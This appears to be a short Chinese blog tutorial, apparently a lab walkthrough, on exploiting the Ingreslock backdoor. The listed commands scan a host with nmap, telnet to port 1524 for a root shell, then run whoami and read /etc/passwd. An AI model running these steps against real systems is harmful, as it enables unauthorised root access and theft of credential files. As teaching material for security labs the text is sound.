溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點(diǎn)擊 登錄注冊 即表示同意《億速云用戶服務(wù)條款》

Ingreslock后門漏洞

發(fā)布時(shí)間:2020-06-24 12:00:06 來源:網(wǎng)絡(luò) 閱讀:1580 作者:白帽生活 欄目:安全技術(shù)

利用telnet命令連接目標(biāo)主機(jī)的1524端口,直接獲取root權(quán)限。


Ingreslock后門程序監(jiān)聽在1524端口,連接到1524端口就可以直接獲得root權(quán)限, 經(jīng)常被用于***一個(gè)暴露的服務(wù)器。


 一、 利用nmap工具掃描目標(biāo)主機(jī)

1.1 使用nmap命令對目標(biāo)主機(jī)進(jìn)行掃描。單擊桌面空白處,右鍵菜單選擇“在終端中打開”。


1.2 在終端中輸入命令“nmap –sV  192.168.1.3”,對目標(biāo)主機(jī)進(jìn)行端口掃描,發(fā)現(xiàn)開放1524端口。


Ingreslock后門漏洞


1.3 在終端中輸入命令“telnet 192.168.1.3 1524”,連接目標(biāo)主機(jī)1524端口,先是連接成功。如圖3所示


1.4 在終端中輸入命令“whoami”,查找獲取的權(quán)限。如圖4所示


Ingreslock后門漏洞



1.5 在終端中輸入命令“ifconfig eth0”,查看網(wǎng)卡信息,在終端下輸入“cat /etc/passwd”,查看遠(yuǎn)程主機(jī)的密碼文件。


Ingreslock后門漏洞

Ingreslock后門漏洞




向AI問一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場,如果涉及侵權(quán)請聯(lián)系站長郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI